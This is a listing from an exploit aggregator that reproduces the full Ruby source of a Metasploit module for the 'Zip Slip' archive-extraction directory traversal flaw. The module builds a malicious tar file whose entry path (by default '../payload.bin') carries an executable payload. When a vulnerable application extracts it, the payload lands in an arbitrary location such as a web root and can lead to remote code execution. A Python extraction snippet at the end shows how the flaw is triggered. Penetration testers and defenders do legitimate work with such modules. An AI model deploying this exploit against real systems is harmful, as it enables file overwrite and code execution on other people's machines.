Exploit for Generic Zip Slip Traversal

Name: Exploit for Generic Zip Slip Traversal
Rating: 5 (226 reviews)
2019-09-12 | CVSS 0.1
## https://sploitus.com/exploit?id=PACKETSTORM:154473
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'rex/zip'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ManualRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Exploit::EXE  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Generic Zip Slip Traversal Vulnerability",  
'Description' => %q{  
This is a generic arbitrary file overwrite technique, which typically results in remote  
command execution. This targets a simple yet widespread vulnerability that has been  
seen affecting a variety of popular products including HP, Amazon, Apache, Cisco, etc.  
The idea is that often archive extraction libraries have no mitigations against  
directory traversal attacks. If an application uses it, there is a risk when opening an  
archive that is maliciously modified, and result in the embedded payload to be written  
to an arbitrary location (such as a web root), and result in remote code execution.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Snyk', # Technique discovery  
'sinn3r' # Metasploit  
],  
'References' =>  
[  
['URL', 'https://snyk.io/research/zip-slip-vulnerability']  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
'DisablePayloadHandler' => true  
},  
'Platform' => ['linux', 'win', 'unix'],  
'Targets' =>  
[  
['Manually determined', {}]  
],  
'Privileged' => false,  
'DisclosureDate' => "Jun 05 2018"  
))  
  
register_options([  
OptString.new('FILENAME', [true, 'The tar file (tar)', 'msf.tar']),  
OptString.new('TARGETPAYLOADPATH', [true, 'The targeted path for payload', '../payload.bin'])  
])  
end  
  
class ZipSlipArchive  
attr_reader :data  
attr_reader :fname  
attr_reader :payload  
  
def initialize(n, p)  
@fname = n  
@payload = p  
@data = make  
end  
  
def make  
data = ''  
path = Rex::FileUtils.normalize_unix_path(fname)  
tar = StringIO.new  
Rex::Tar::Writer.new(tar) do |t|  
t.add_file(path, 0777) do |f|  
f.write(payload)  
end  
end  
tar.seek(0)  
data = tar.read  
tar.close  
data  
end  
end  
  
def make_tar(target_payload_path)  
elf = generate_payload_exe(code: payload.encoded)  
archive = ZipSlipArchive.new(target_payload_path, generate_payload_exe)  
archive.make  
end  
  
def exploit  
target_payload_path = datastore['TARGETPAYLOADPATH']  
unless target_payload_path.match(/\.\.\//)  
print_error('Please set a traversal path')  
return  
end  
  
tar = make_tar(target_payload_path)  
file_create(tar)  
print_status('When extracted, the payload is expected to extract to:')  
print_status(target_payload_path)  
end  
end  
  
=begin  
A quick test:  
  
$ python  
>>> import tarfile  
>>> t = tarfile.open('test.tar')  
>>> t.extractall()  
>>> exit()  
  
=end